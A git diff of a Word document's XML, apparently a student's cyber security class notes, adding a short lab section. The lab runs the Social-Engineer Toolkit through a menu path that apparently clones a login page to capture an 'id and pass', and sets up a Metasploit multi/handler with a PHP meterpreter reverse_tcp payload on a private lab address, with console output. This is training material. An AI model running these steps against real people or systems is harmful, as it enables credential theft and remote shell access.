--- a/Class_no_8/Cyber_Security_C-8.docx
+++ b/Class_no_8/Cyber_Security_C-8.docx
@@ -1081,8 +1081,832 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="thinThickThinMediumGap" w:sz="18" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="32"/>
+        </w:rPr>
+        <w:t>Lab</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>su</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>setoolkit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:sym w:font="Wingdings" w:char="F0E0"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:sym w:font="Wingdings" w:char="F0E0"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:sym w:font="Wingdings" w:char="F0E0"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:sym w:font="Wingdings" w:char="F0E0"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:sym w:font="Wingdings" w:char="F0E0"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Enter</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:sym w:font="Wingdings" w:char="F0E0"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>(go another terminal)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>su</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>use</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>exploit.multi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>/handler</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>use</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> payload </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>msf6</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit(multi/handler) &gt; use LHOST 192.168.10.196</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>[-] No results from search</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>[-] Failed to load module: LHOST</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>msf6</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit(multi/handler) &gt; use LHOST 192.168.10.196</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>[-] No results from search</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>[-] Failed to load module: LHOST</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>msf6</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit(multi/handler) &gt; set LHOST 192.168.10.196</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>LHOST =&gt; 192.168.10.196</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>msf6</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit(multi/handler) &gt; set LHOST 192.168.10.196</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>LHOST =&gt; 192.168.10.196</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>msf6</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit(multi/handler) &gt; set LPORT 444</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>LPORT =&gt; 444</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>msf6</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit(multi/handler) &gt; exploit</w:t>
+      </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.10.196:444 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>^</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>C[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-] Exploit failed [user-interrupt]: Interrupt </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>[-] exploit: Interrupted</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>msf6</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit(multi/handler) &gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C8E0740" wp14:editId="34A88E48">
+            <wp:extent cx="5943600" cy="1671320"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="1" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1671320"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Enter id and pass</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="661E304C" wp14:editId="3C63F487">
+            <wp:extent cx="5943600" cy="5417820"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2" name="Picture 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="5417820"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>

--- a/Class_no_8/Cyber_Security_C-8.docx
+++ b/Class_no_8/Cyber_Security_C-8.docx
@@ -61,15 +61,7 @@
           <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
           <w:sz w:val="28"/>
         </w:rPr>
-        <w:t>03 Oct</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
-          <w:sz w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 2024</w:t>
+        <w:t>03 Oct 2024</w:t>
       </w:r>
     </w:p>
     <w:p>
